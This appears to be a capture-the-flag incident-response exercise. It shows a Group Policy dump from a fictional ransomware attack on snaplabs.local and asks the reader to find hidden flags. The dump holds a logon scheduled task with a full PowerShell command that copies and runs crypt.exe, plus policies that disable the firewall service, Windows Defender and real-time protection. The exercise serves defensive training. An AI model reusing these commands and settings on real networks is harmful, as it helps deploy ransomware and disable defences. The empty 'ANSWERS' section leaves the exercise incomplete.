GPO-forensics — Red Threat

As an incident responder, you have been assigned to investigate a critical situation at Snaplabs.local. The organization has fallen victim to a devastating ransomware attack. In your quest to identify and neutralize the threat, you have obtained the HTML output of a Group Policy Object (GPO) dump. This report holds crucial information that may help in understanding the attack and recovering the compromised systems. Your objective is to meticulously examine the code below, as it contains four hidden flags. By skillfully analyzing the GPO dump, you can uncover these flags and gather valuable insights that will aid in the investigation. Sharpen your forensic skills, and let the pursuit of these flags guide you towards triumph over the ransomware menace. Answers at the bottom.

Default Domain Policy

Group Policy Management

body { font-size:68%;font-family:MS Shell Dlg; margin:0px,0px,0px,0px; border: 1px solid #666666; background:#F6F6F6; width:100%; word-break:normal; word-wrap:break-word; } .head { font-weight:bold; font-size:160%; font-family:MS Shell Dlg; width:100%; color:#6587DC; background:#E3EAF9; border:1px solid #5582D2; padding-left:8px; height:24px; } .path { margin-left: 10px; margin-top: 10px; margin-bottom:5px;width:100%; } .info { padding-left:10px;width:100%; } table { font-size:100%; width:100%; border:1px solid #999999; } th { border-bottom:1px solid #999999; text-align:left; padding-left:10px; height:24px; } td { background:#FFFFFF; padding-left:10px; padding-bottom:10px; padding-top:10px; } .btn { width:100%; text-align:right; margin-top:16px; } .hdr { font-weight:bold; border:1px solid #999999; text-align:left; padding-top: 4px; padding-left:10px; height:24px; margin-bottom:-1px; width:100%; } .bdy { width:100%; height:182px; display:block; overflow:scroll; z-index:2; background:#FFFFFF; padding-left:10px; padding-bottom:10px; padding-top:10px; border:1px solid #999999; } button { width:6.9em; height:2.1em; font-size:100%; font-family:MS Shell Dlg; margin-right:15px; } @media print { .bdy { display:block; overflow:visible; } button { display:none; } .head { color:#000000; background:#FFFFFF; border:1px solid #000000; } }

Setting Path:

Explanation

No explanation is available for this setting.

Supported On:

Not available

Default Domain Policy
Data collected on: 6/13/2023 12:55:39 AM

General

Details

Domain	snaplabs.local
Owner	SNAPLABS\Domain Admins
Created	6/30/2021 10:08:04 PM
Modified	6/13/2023 12:32:46 AM
User Revisions	0 (AD), 0 (SYSVOL)
Computer Revisions	23 (AD), 23 (SYSVOL)
Unique ID	{31B2F340-016D-11D2-945F-00C04FB984F9}
GPO Status	Enabled

Links

Location	Enforced	Link Status	Path
snaplabs	No	Enabled	snaplabs.local

This list only includes links in the domain of the GPO.

Security Filtering

The settings in this GPO can only apply to the following groups, users, and computers:

Name
NT AUTHORITY\Authenticated Users

Delegation

These groups and users have the specified permission for this GPO

Name	Allowed Permissions	Inherited
NT AUTHORITY\Authenticated Users	Read (from Security Filtering)	No
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS	Read	No
NT AUTHORITY\SYSTEM	Edit settings, delete, modify security	No

Computer Configuration (Enabled)

Policies

Windows Settings

Security Settings

Account Policies/Password Policy

Policy	Setting
Enforce password history	24 passwords remembered
Maximum password age	42 days
Minimum password age	1 days
Minimum password length	7 characters
Password must meet complexity requirements	Enabled
Store passwords using reversible encryption	Enabled

Account Policies/Account Lockout Policy

Policy	Setting
Account lockout threshold	0 invalid logon attempts

Account Policies/Kerberos Policy

Policy	Setting
Enforce user logon restrictions	Enabled
Maximum lifetime for service ticket	600 minutes
Maximum lifetime for user ticket	10 hours
Maximum lifetime for user ticket renewal	7 days
Maximum tolerance for computer clock synchronization	5 minutes

Local Policies/Security Options

Network Access

Policy	Setting
Network access: Allow anonymous SID/Name translation	Disabled

Network Security

Policy	Setting
Network security: Do not store LAN Manager hash value on next password change	Enabled
Network security: Force logoff when logon hours expire	Disabled

Public Key Policies/Encrypting File System

Certificates

Issued To	Issued By	Expiration Date	Intended Purposes
Administrator	Administrator	9/13/2121 3:51:08 PM	File Recovery

For additional information about individual settings, launch the Local Group Policy Object Editor.

Preferences

Control Panel Settings

Scheduled Tasks

Scheduled Task (Name: IT startup)

IT startup (Order: 1)

General

Action

Create

Task

Name	IT startup
Run	C:\Windows\System32\cmd.exe
Arguments	/c powershell -Command "(New-Object System.Net.WebClient).DownloadFile('file://domain/sysvol/crypt.exe', 'C:\Users\Public\crypt.exe'); Start-Process -FilePath 'C:\Users\Public\crypt.exe'"
Scheduled task runs at a specified time	Enabled

Schedule

1. Run at user logon

Settings

Delete the task if it is not scheduled to run again	No
Stop the task if the computer ceases to be idle	No
Do not start the task if the computer is running on batteries	Enabled
Stop the task if battery mode begins	Enabled
Wake the computer to run this task	Disabled

Common

Options

Stop processing items on this extension if an error occurs on this item	No
Remove this item when it is no longer applied	No
Apply once and do not reapply	No

Services

Service (Name: MpsSvc)

MpsSvc (Order: 1)

General

Service name	MpsSvc
Action	Stop service
Startup type:	Disabled
Wait timeout if service is locked:	30 seconds

Service Account

Log on service as:	LocalSystem
Allow service to interact with the desktop:	Yes

Recovery

First failure:	No change
Second failure:	No change
Subsequent failures:	No change

Common

Options

Stop processing items on this extension if an error occurs on this item	No
Apply once and do not reapply	No

User Configuration (Enabled)

No settings defined.

IT test policy

Group Policy Management

body { font-size:68%;font-family:MS Shell Dlg; margin:0px,0px,0px,0px; border: 1px solid #666666; background:#F6F6F6; width:100%; word-break:normal; word-wrap:break-word; } .head { font-weight:bold; font-size:160%; font-family:MS Shell Dlg; width:100%; color:#6587DC; background:#E3EAF9; border:1px solid #5582D2; padding-left:8px; height:24px; } .path { margin-left: 10px; margin-top: 10px; margin-bottom:5px;width:100%; } .info { padding-left:10px;width:100%; } table { font-size:100%; width:100%; border:1px solid #999999; } th { border-bottom:1px solid #999999; text-align:left; padding-left:10px; height:24px; } td { background:#FFFFFF; padding-left:10px; padding-bottom:10px; padding-top:10px; } .btn { width:100%; text-align:right; margin-top:16px; } .hdr { font-weight:bold; border:1px solid #999999; text-align:left; padding-top: 4px; padding-left:10px; height:24px; margin-bottom:-1px; width:100%; } .bdy { width:100%; height:182px; display:block; overflow:scroll; z-index:2; background:#FFFFFF; padding-left:10px; padding-bottom:10px; padding-top:10px; border:1px solid #999999; } button { width:6.9em; height:2.1em; font-size:100%; font-family:MS Shell Dlg; margin-right:15px; } @media print { .bdy { display:block; overflow:visible; } button { display:none; } .head { color:#000000; background:#FFFFFF; border:1px solid #000000; } }

Setting Path:

Explanation

No explanation is available for this setting.

Supported On:

Not available

IT test policy
Data collected on: 6/13/2023 12:55:39 AM

General

Details

Domain	snaplabs.local
Owner	SNAPLABS\Domain Admins
Created	6/13/2023 12:04:00 AM
Modified	6/13/2023 12:06:42 AM
User Revisions	0 (AD), 0 (SYSVOL)
Computer Revisions	5 (AD), 5 (SYSVOL)
Unique ID	{5BF778F5-BFA2-4961-B493-3079DE9547B4}
GPO Status	Enabled

Links

Location	Enforced	Link Status	Path
snaplabs	No	Enabled	snaplabs.local

This list only includes links in the domain of the GPO.

Security Filtering

The settings in this GPO can only apply to the following groups, users, and computers:

Name
NT AUTHORITY\Authenticated Users

Delegation

These groups and users have the specified permission for this GPO

Name	Allowed Permissions	Inherited
NT AUTHORITY\Authenticated Users	Read (from Security Filtering)	No
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS	Read	No
NT AUTHORITY\SYSTEM	Edit settings, delete, modify security	No
SNAPLABS\Domain Admins	Edit settings, delete, modify security	No
SNAPLABS\Enterprise Admins	Edit settings, delete, modify security	No

Computer Configuration (Enabled)

Policies

Administrative Templates

Policy definitions (ADMX files) retrieved from the local computer.

Windows Components/Windows Defender

Policy	Setting	Comment
Turn off Windows Defender	Enabled

Windows Components/Windows Defender/Real-time Protection

Policy	Setting	Comment
Monitor file and program activity on your computer	Disabled
Scan all downloaded files and attachments	Disabled
Turn off real-time protection	Enabled
Turn on behavior monitoring	Disabled

User Configuration (Enabled)

No settings defined.

Default Domain Controllers Policy

Group Policy Management

body { font-size:68%;font-family:MS Shell Dlg; margin:0px,0px,0px,0px; border: 1px solid #666666; background:#F6F6F6; width:100%; word-break:normal; word-wrap:break-word; } .head { font-weight:bold; font-size:160%; font-family:MS Shell Dlg; width:100%; color:#6587DC; background:#E3EAF9; border:1px solid #5582D2; padding-left:8px; height:24px; } .path { margin-left: 10px; margin-top: 10px; margin-bottom:5px;width:100%; } .info { padding-left:10px;width:100%; } table { font-size:100%; width:100%; border:1px solid #999999; } th { border-bottom:1px solid #999999; text-align:left; padding-left:10px; height:24px; } td { background:#FFFFFF; padding-left:10px; padding-bottom:10px; padding-top:10px; } .btn { width:100%; text-align:right; margin-top:16px; } .hdr { font-weight:bold; border:1px solid #999999; text-align:left; padding-top: 4px; padding-left:10px; height:24px; margin-bottom:-1px; width:100%; } .bdy { width:100%; height:182px; display:block; overflow:scroll; z-index:2; background:#FFFFFF; padding-left:10px; padding-bottom:10px; padding-top:10px; border:1px solid #999999; } button { width:6.9em; height:2.1em; font-size:100%; font-family:MS Shell Dlg; margin-right:15px; } @media print { .bdy { display:block; overflow:visible; } button { display:none; } .head { color:#000000; background:#FFFFFF; border:1px solid #000000; } }

Setting Path:

Explanation

No explanation is available for this setting.

Supported On:

Not available

Default Domain Controllers Policy
Data collected on: 6/13/2023 12:55:39 AM

General

Details

Domain	snaplabs.local
Owner	SNAPLABS\Domain Admins
Created	6/30/2021 10:08:04 PM
Modified	6/30/2021 10:08:04 PM
User Revisions	0 (AD), 0 (SYSVOL)
Computer Revisions	1 (AD), 1 (SYSVOL)
Unique ID	{6AC1786C-016F-11D2-945F-00C04fB984F9}
GPO Status	Enabled

Links

Location	Enforced	Link Status	Path
Domain Controllers	No	Enabled	snaplabs.local/Domain Controllers

This list only includes links in the domain of the GPO.

Security Filtering

The settings in this GPO can only apply to the following groups, users, and computers:

Name
NT AUTHORITY\Authenticated Users

Delegation

These groups and users have the specified permission for this GPO

Name	Allowed Permissions	Inherited
NT AUTHORITY\Authenticated Users	Read (from Security Filtering)	No
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS	Read	No
NT AUTHORITY\SYSTEM	Edit settings, delete, modify security	No

Computer Configuration (Enabled)

Policies

Windows Settings

Security Settings

Local Policies/User Rights Assignment

Policy	Setting
Access this computer from the network	BUILTIN\Pre-Windows 2000 Compatible Access, NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS, NT AUTHORITY\Authenticated Users, BUILTIN\Administrators, Everyone
Add workstations to domain	NT AUTHORITY\Authenticated Users
Adjust memory quotas for a process	BUILTIN\Administrators, NT AUTHORITY\NETWORK SERVICE, NT AUTHORITY\LOCAL SERVICE
Allow log on locally	NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS, BUILTIN\Print Operators, BUILTIN\Server Operators, BUILTIN\Account Operators, BUILTIN\Backup Operators, BUILTIN\Administrators
Back up files and directories	BUILTIN\Server Operators, BUILTIN\Backup Operators, BUILTIN\Administrators
Bypass traverse checking	BUILTIN\Pre-Windows 2000 Compatible Access, NT AUTHORITY\Authenticated Users, BUILTIN\Administrators, NT AUTHORITY\NETWORK SERVICE, NT AUTHORITY\LOCAL SERVICE, Everyone
Change the system time	BUILTIN\Server Operators, BUILTIN\Administrators, NT AUTHORITY\LOCAL SERVICE
Create a pagefile	BUILTIN\Administrators
Debug programs	BUILTIN\Administrators
Enable computer and user accounts to be trusted for delegation	BUILTIN\Administrators
Force shutdown from a remote system	BUILTIN\Server Operators, BUILTIN\Administrators
Generate security audits	NT AUTHORITY\NETWORK SERVICE, NT AUTHORITY\LOCAL SERVICE
Increase scheduling priority	BUILTIN\Administrators
Load and unload device drivers	BUILTIN\Print Operators, BUILTIN\Administrators
Log on as a batch job	BUILTIN\Performance Log Users, BUILTIN\Backup Operators, BUILTIN\Administrators
Manage auditing and security log	BUILTIN\Administrators
Modify firmware environment values	BUILTIN\Administrators
Profile single process	BUILTIN\Administrators
Profile system performance	NT SERVICE\WdiServiceHost, BUILTIN\Administrators
Remove computer from docking station	BUILTIN\Administrators
Replace a process level token	NT AUTHORITY\NETWORK SERVICE, NT AUTHORITY\LOCAL SERVICE
Restore files and directories	BUILTIN\Server Operators, BUILTIN\Backup Operators, BUILTIN\Administrators
Shut down the system	BUILTIN\Print Operators, BUILTIN\Server Operators, BUILTIN\Backup Operators, BUILTIN\Administrators
Take ownership of files or other objects	BUILTIN\Administrators

Local Policies/Security Options

Domain Controller

Policy	Setting
Domain controller: LDAP server signing requirements	None

Domain Member

Policy	Setting
Domain member: Digitally encrypt or sign secure channel data (always)	Enabled

Microsoft Network Server

Policy	Setting
Microsoft network server: Digitally sign communications (always)	Enabled
Microsoft network server: Digitally sign communications (if client agrees)	Enabled

User Configuration (Enabled)

No settings defined.

ANSWERS